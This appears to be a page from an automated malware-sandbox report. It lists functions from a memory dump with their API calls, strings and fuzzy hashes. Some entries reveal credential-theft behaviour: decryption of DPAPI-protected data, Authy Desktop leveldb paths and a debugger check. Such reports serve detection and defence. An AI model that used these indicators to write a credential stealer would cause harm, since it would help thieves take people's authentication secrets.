Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d3e5f59fb1cd4fb96dcce79dae306185c785ad1d3e6e7c6da81d393ad4766188
Instruction ID: 4d2412f6bbda0a28e61c2f35c46982ba3aff38bf182fb5af93fb0c367d0ea2d1
Opcode Fuzzy Hash: d3e5f59fb1cd4fb96dcce79dae306185c785ad1d3e6e7c6da81d393ad4766188
Instruction Fuzzy Hash: 3CE06D32141221DBEE312A7AAD01B5B7A49DF533F0F1D4521FC45D62D0EB60DC8282B9

Uniqueness

Uniqueness Score: -1.00%

Function 00DAA4C5, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00DAA8B5,?,?,00000000,?,00DAA8B5,00000000,0000000C), ref: 00DAA4E2

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 58267a59980c4090e01bebca512a52770c1fc44a7946f78d347d18a4c48eea68
Instruction ID: 27292ad527ccdbd593bcc8aa9d8390a5a08aabfae1ae99cd8b35b7d07d7a71a0
Opcode Fuzzy Hash: 58267a59980c4090e01bebca512a52770c1fc44a7946f78d347d18a4c48eea68
Instruction Fuzzy Hash: DFD06C3200020DFBDF028F84EC06EDA3BAAFB4C714F018100BA1896120C732E921AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2DF4, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DA2E07

Part of subcall function 00DA6035: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA2E0C,00D2254A,?), ref: 00DA604B
Part of subcall function 00DA6035: GetLastError.KERNEL32(?,?,00DA2E0C,00D2254A,?), ref: 00DA605D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: e0b6a45cb10ddb00df17d619f35eb20b0fe095f3d5f8916126a588bdb7446ae3
Instruction ID: 56d8176b10a5e601c9fe71b5ebc86a29e7e96b8114ccb9027872e425bd060fd0
Opcode Fuzzy Hash: e0b6a45cb10ddb00df17d619f35eb20b0fe095f3d5f8916126a588bdb7446ae3
Instruction Fuzzy Hash: E1C08C31000208FBCB159B41C80AA4E7BB8DB803A4F200044F40057250CAB1EE4096A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D7A320, Relevance: 10.6, Strings: 8, Instructions: 556COMMON

Download Yara Rule

Strings

no such table: %s, xrefs: 00D7A9BD
too many columns in result set, xrefs: 00D7A5C4
too many references to "%s": max 65535, xrefs: 00D7A5D8
access to view "%s" prohibited, xrefs: 00D7A47D
unsafe use of virtual table "%s", xrefs: 00D7A4C2
%s.%s.%s, xrefs: 00D7A92B
no tables specified, xrefs: 00D7A9CD
%s.%s, xrefs: 00D7A887

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %s.%s$%s.%s.%s$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 0-4238847658
Opcode ID: 4b9b7055936642fbfef1cd1930162be06a2139b096e0060bca7b6adad05f4dc7
Instruction ID: ff08d532b6c0f7ea6adcc10576bf58b7a18f7b4d07cc6e7b447c9604c11ac881
Opcode Fuzzy Hash: 4b9b7055936642fbfef1cd1930162be06a2139b096e0060bca7b6adad05f4dc7
Instruction Fuzzy Hash: 5F223A716083419FC718DF28C581A2EBBE1FFC8714F58892DF9899B291E771E845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D92073, Relevance: 7.8, Strings: 6, Instructions: 318COMMON

Download Yara Rule

Strings

NOCASE, xrefs: 00D92218
temp, xrefs: 00D92351
MATCH, xrefs: 00D92386
main, xrefs: 00D92341
RTRIM, xrefs: 00D9222D
BINARY, xrefs: 00D921A3, 00D921F2, 00D92203, 00D92319

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: BINARY$MATCH$NOCASE$RTRIM$main$temp
API String ID: 0-1145213229
Opcode ID: 92f3f9334c344e2c8ac7b9430c9a92f4bcecf7acd7974102131d14656746476c
Instruction ID: f8037996f1d3e54dffadc36b31890148c3dae9de7b9b78696089e050ff0db5e2
Opcode Fuzzy Hash: 92f3f9334c344e2c8ac7b9430c9a92f4bcecf7acd7974102131d14656746476c
Instruction Fuzzy Hash: 8BB19E70604341ABDF14EF29C881A6A7BA9EF85314F18447EBD499B396DB74D804CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D2658C, Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1572COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00D2688F

Part of subcall function 00D213DB: WaitForSingleObject.KERNEL32(00000BB8), ref: 00D2141C
Part of subcall function 00D213DB: SetFilePointer.KERNEL32(?,00000000,?,00000000,?,?,?,?), ref: 00D21491
Part of subcall function 00D213DB: WriteFile.KERNEL32(?,02FA0000,?,?,00000000), ref: 00D214BF
Part of subcall function 00D213DB: ReleaseMutex.KERNEL32(?,?,?,?), ref: 00D214D9

Part of subcall function 00DA2DF4: _free.LIBCMT ref: 00DA2E07

Strings

NO NAME FAT32 , xrefs: 00D27443
NO NAME FAT , xrefs: 00D27499

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$MutexObjectPointerReleaseSingleWaitWrite__aulldiv_free
String ID: NO NAME FAT $NO NAME FAT32
API String ID: 3731277935-703230642
Opcode ID: 8c11993b4c4ef46f479e102662f54a283e9360ab04fa17b2ae000db25ccc7ef5
Instruction ID: e3d656e80d0d11cd02ca0b3b458dc41df7fc023fc96b0ea8de530b3f3288dbf9
Opcode Fuzzy Hash: 8c11993b4c4ef46f479e102662f54a283e9360ab04fa17b2ae000db25ccc7ef5
Instruction Fuzzy Hash: 67D2B370E042698BDF28CFA9D8906EDFBF2FFA9308F188159D455AB741D7349846CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DA60BD, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00DA61B5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00DA61BF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00DA61CC

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: db107cca27e0cdf9e24674bd85234995d8b9ae363630657f9a9adb2cfb66de02
Instruction ID: d9f0588379a2b837ddbeb98283ca93eec01dc9a7ae215f20ee9fb8516d2f6e06
Opcode Fuzzy Hash: db107cca27e0cdf9e24674bd85234995d8b9ae363630657f9a9adb2cfb66de02
Instruction Fuzzy Hash: 6631C674941329EBCB21DF68D88979CBBB8AF08350F5046EAE41CA7251E7709F858F54

Uniqueness

Uniqueness Score: -1.00%

Function 00D247B6, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 386COMMON

Download Yara Rule

Strings

, xrefs: 00D24AD7

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: MutexObjectReleaseSingleWait
String ID:
API String ID: 2017088797-3916222277
Opcode ID: 6b81fa4d23c286ae49cc13488bf85d30580282a79e71f7f7566b5758fb270c0c
Instruction ID: 3e01b542d84238c372dbd5e9019ba32821857f50b42c2cff2d14ae840aeca6a2
Opcode Fuzzy Hash: 6b81fa4d23c286ae49cc13488bf85d30580282a79e71f7f7566b5758fb270c0c
Instruction Fuzzy Hash: 73E18E75A043648FCF28DF68D491AAEBBF1AF69314F28415DE849AB346DB30DC45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DA452A, Relevance: 3.0, APIs: 2, Instructions: 34timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,259C4F59,259C4F59,?,00D9EB24,00000000), ref: 00DA453D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA456E

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: 667f8a4919d3bb84d5cf6d36420ee48261767a35eda647a4201079e09334a008
Instruction ID: c49ea6f8206d263b0ccf3f814406303b416b504acb64401c0be20fb397d43eac
Opcode Fuzzy Hash: 667f8a4919d3bb84d5cf6d36420ee48261767a35eda647a4201079e09334a008
Instruction Fuzzy Hash: ECF0BB71D00308BBDB14DF68C845B6D7BE8EB81315F248658A502E6280D7F0EA008774

Uniqueness

Uniqueness Score: -1.00%

Function 00D24136, Relevance: 3.0, Strings: 2, Instructions: 478COMMON

Download Yara Rule

Strings

rrAa, xrefs: 00D246E3
RRaA, xrefs: 00D246D1

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RRaA$rrAa
API String ID: 0-901670170
Opcode ID: ff9b633a9c985ebd9499f8b249376c63f18c58fb548a2588a86c1271c2aa66c6
Instruction ID: 1b96a7f0501e79e366ea5b1425fb8811be0f13202eb9da9ee9e42a43a37654ae
Opcode Fuzzy Hash: ff9b633a9c985ebd9499f8b249376c63f18c58fb548a2588a86c1271c2aa66c6
Instruction Fuzzy Hash: 7702A274A042718ACB15DF28D4D03B97BE1AF75319F1881AADCA5CF28AE734C945CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D8C6CB, Relevance: 2.2, Strings: 1, Instructions: 920COMMON

Download Yara Rule

Strings

V, xrefs: 00D8CA2B

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 5e80605cad113dcc733e886a14ac76d5909ddf91b12ead62c47d9aef009ebf79
Instruction ID: 8a6fadfa57e5ff9887c2a4df6835452b5993eca98979d7e00e220346aca4cf43
Opcode Fuzzy Hash: 5e80605cad113dcc733e886a14ac76d5909ddf91b12ead62c47d9aef009ebf79
Instruction Fuzzy Hash: 8B625E71A10204AFDF14EFA4CC95BAEBBB6FF48710F14852AE505AB291DB70A941CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D8885F, Relevance: 1.9, Strings: 1, Instructions: 604COMMON

Download Yara Rule

Strings

no query solution, xrefs: 00D88C0E

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: no query solution
API String ID: 0-1895316939
Opcode ID: 5b0569e175367053ab3ae77df3d455df98164ba9f8652c814ef409cf40183638
Instruction ID: 0514d5b552f8f1707a599be057e3f21994cc1c5cef750fc64328c43076168527
Opcode Fuzzy Hash: 5b0569e175367053ab3ae77df3d455df98164ba9f8652c814ef409cf40183638
Instruction Fuzzy Hash: 2E325E75E002599FCB18DFA9C480AADBBF1FF58310F64815AE855EB385D730AD81DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D36021, Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 00D36061

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: e27a4cb481ba330bdf9f94c7fbba6d316f1b6202f13097855046485dab185849
Instruction ID: 886b7626e1d623c341a1f2e36f206fc07b7d757224994439c5e39aa179b022a1
Opcode Fuzzy Hash: e27a4cb481ba330bdf9f94c7fbba6d316f1b6202f13097855046485dab185849
Instruction Fuzzy Hash: 4901CCB6D10219AF8F04DFA5DC469EFBBBCFF48250F04452AE915E3200E670EA548BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9C49D, Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96dcb2b6e8fa0cb5ed86461a2c764af31f99aeead824f3900cc941e74b61ca17
Instruction ID: 38bc4e1d0e5e6c51346a6ebbf455ec72b7822da63c6b08980060de97a839fcee
Opcode Fuzzy Hash: 96dcb2b6e8fa0cb5ed86461a2c764af31f99aeead824f3900cc941e74b61ca17
Instruction Fuzzy Hash: 24023670A21A22EFCB59CF29C6805A4BBB1BF55310B54622AC56687E81D331F871CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00D501A3, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6272519954365315f4c92702558a84e81782d165ce51730e73652d34cb713141
Instruction ID: 8d43d32e2d5bfa4ab468bac7854a6384915332c7327322b6d7039304c3f37a47
Opcode Fuzzy Hash: 6272519954365315f4c92702558a84e81782d165ce51730e73652d34cb713141
Instruction Fuzzy Hash: 3981C970600B41DBEF39CB29808436ABED1BF85306F2C852ECC9986591D730E889C775

Uniqueness

Uniqueness Score: -1.00%

Function 00DAC8A0, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00DAC8E4

Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC278
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC28A
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC29C
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC2AE
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC2C0
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC2D2
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC2E4
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC2F6
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC308
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC31A
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC32C
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC33E
Part of subcall function 00DAC25B: _free.LIBCMT ref: 00DAC350

_free.LIBCMT ref: 00DAC8D9

Part of subcall function 00DA6035: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA2E0C,00D2254A,?), ref: 00DA604B
Part of subcall function 00DA6035: GetLastError.KERNEL32(?,?,00DA2E0C,00D2254A,?), ref: 00DA605D

_free.LIBCMT ref: 00DAC8FB
_free.LIBCMT ref: 00DAC910
_free.LIBCMT ref: 00DAC91B
_free.LIBCMT ref: 00DAC93D
_free.LIBCMT ref: 00DAC950
_free.LIBCMT ref: 00DAC95E
_free.LIBCMT ref: 00DAC969
_free.LIBCMT ref: 00DAC9A1
_free.LIBCMT ref: 00DAC9A8
_free.LIBCMT ref: 00DAC9C5
_free.LIBCMT ref: 00DAC9DD

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 6d2745817a9ce0e1ddc3a311f5e22ca844b2c85957bf1634f48776a661066960
Instruction ID: cdb15d5f0c66964e3ec5583e5df3ddf99343367f1d76a3ecc01b25a5852e87a2
Opcode Fuzzy Hash: 6d2745817a9ce0e1ddc3a311f5e22ca844b2c85957bf1634f48776a661066960
Instruction Fuzzy Hash: FC316F72614605DFDB35AB39D849B5773E8EF02762F185419E189D7161DF34EC808B34

Uniqueness

Uniqueness Score: -1.00%

Function 00DA6631, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DA6647

Part of subcall function 00DA6035: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA2E0C,00D2254A,?), ref: 00DA604B
Part of subcall function 00DA6035: GetLastError.KERNEL32(?,?,00DA2E0C,00D2254A,?), ref: 00DA605D

_free.LIBCMT ref: 00DA6653
_free.LIBCMT ref: 00DA665E
_free.LIBCMT ref: 00DA6669
_free.LIBCMT ref: 00DA6674
_free.LIBCMT ref: 00DA667F
_free.LIBCMT ref: 00DA668A
_free.LIBCMT ref: 00DA6695
_free.LIBCMT ref: 00DA66A0
_free.LIBCMT ref: 00DA66AE

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2c92aeda540780d4c991634394568425ee7da627c2f904c201b4f706c7b70a4d
Instruction ID: dc4d1ecdb33ab0eb11df079c0003924daf4ba4e3017b5b20f48c84e80abb47a9
Opcode Fuzzy Hash: 2c92aeda540780d4c991634394568425ee7da627c2f904c201b4f706c7b70a4d
Instruction Fuzzy Hash: EB21B676900108EFCB12EF94C885DDE7BB8EF09740B4441A6F615DB121EB36EA85CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D36090, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D96699: GlobalAlloc.KERNELBASE(00000040,0000FFFE,00000074,00000064,00D336C7), ref: 00D966A4
Part of subcall function 00D96699: StrStrW.KERNELBASE ref: 00D966C9
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966D6
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966E5

wsprintfW.USER32 ref: 00D360D4
lstrcatW.KERNEL32(00000000,00DCEE50), ref: 00D360E3
wsprintfW.USER32 ref: 00D3612E

Part of subcall function 00D96506: lstrlenW.KERNEL32(00000000,0000005C,?,6B86F820,00D9A965,?,?,?,?,?,?), ref: 00D9650F
Part of subcall function 00D96506: StrRChrW.SHLWAPI(?,?,?,?,?,?), ref: 00D96528
Part of subcall function 00D96506: lstrcpyW.KERNEL32 ref: 00D96535

Part of subcall function 00D96806: CreateFileW.KERNELBASE ref: 00D96845
Part of subcall function 00D96806: GetFileSize.KERNEL32(00000000,00000000), ref: 00D96858
Part of subcall function 00D96806: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D96863
Part of subcall function 00D96806: PathFindNextComponentW.SHLWAPI ref: 00D968B9

lstrcpyW.KERNEL32 ref: 00D36170
GlobalFree.KERNEL32 ref: 00D361A8

Strings

%s\Local Storage\leveldb\%s, xrefs: 00D36128
Authy Desktop, xrefs: 00D360C7
%s\%s\Local Storage\leveldb\, xrefs: 00D360CE

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$Global$AllocFilewsprintf$ComponentCreateFindFreeNextPathSizelstrcatlstrlen
String ID: %s\%s\Local Storage\leveldb\$%s\Local Storage\leveldb\%s$Authy Desktop
API String ID: 685519840-940741544
Opcode ID: 6c89f734ba93bac27d27e6e851096e0205d3106665c258e435fc771f0e9f2548
Instruction ID: 7790364a4b355772959830073dc644a39384014d30de6347e6304242eb46d303
Opcode Fuzzy Hash: 6c89f734ba93bac27d27e6e851096e0205d3106665c258e435fc771f0e9f2548
Instruction Fuzzy Hash: 4831BFB0A00319EBDF14AB28DD45ABEB7BDEF85314F0405AAE906D3351EB319E448B74

Uniqueness

Uniqueness Score: -1.00%

Function 00DA00C0, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 387COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00DA00F7
___except_validate_context_record.LIBVCRUNTIME ref: 00DA00FF
_ValidateLocalCookies.LIBCMT ref: 00DA0188
__IsNonwritableInCurrentImage.LIBCMT ref: 00DA01B3
_ValidateLocalCookies.LIBCMT ref: 00DA0208

Strings

csm, xrefs: 00DA019D
foo1.zip, xrefs: 00DA0527

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$foo1.zip
API String ID: 1170836740-4195281129
Opcode ID: d1efd310cfe1ff2e812b90217a3d90815df558a3fecf5532f81614267ee64e73
Instruction ID: 206b338e072f4527bebb9bea33d92dfaa6838052596e284c3b0c12251e64bde7
Opcode Fuzzy Hash: d1efd310cfe1ff2e812b90217a3d90815df558a3fecf5532f81614267ee64e73
Instruction Fuzzy Hash: 95C16736E043554BDB218E68C8D03BABF91EF87324F1C427AEE909B392D73699459770

Uniqueness

Uniqueness Score: -1.00%

Function 00DAC3FA, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00DAC3C2: _free.LIBCMT ref: 00DAC3E7

_free.LIBCMT ref: 00DAC448

Part of subcall function 00DA6035: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA2E0C,00D2254A,?), ref: 00DA604B
Part of subcall function 00DA6035: GetLastError.KERNEL32(?,?,00DA2E0C,00D2254A,?), ref: 00DA605D

_free.LIBCMT ref: 00DAC453
_free.LIBCMT ref: 00DAC45E
_free.LIBCMT ref: 00DAC4B2
_free.LIBCMT ref: 00DAC4BD
_free.LIBCMT ref: 00DAC4C8
_free.LIBCMT ref: 00DAC4D3

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c352fc4e521d553290d34ccbdef0c78c2109f520d7140e98d7ffca6201b3cd49
Instruction ID: 5559bc3902c2f1cff96a0ec4096f1944cd9900ba4285477012db9feaf41df86d
Opcode Fuzzy Hash: c352fc4e521d553290d34ccbdef0c78c2109f520d7140e98d7ffca6201b3cd49
Instruction Fuzzy Hash: 35117F72655B04EAD931BBB0CC4BFCF779CDF02710F44EC14B29AA6062DA6AF5494670

Uniqueness

Uniqueness Score: -1.00%

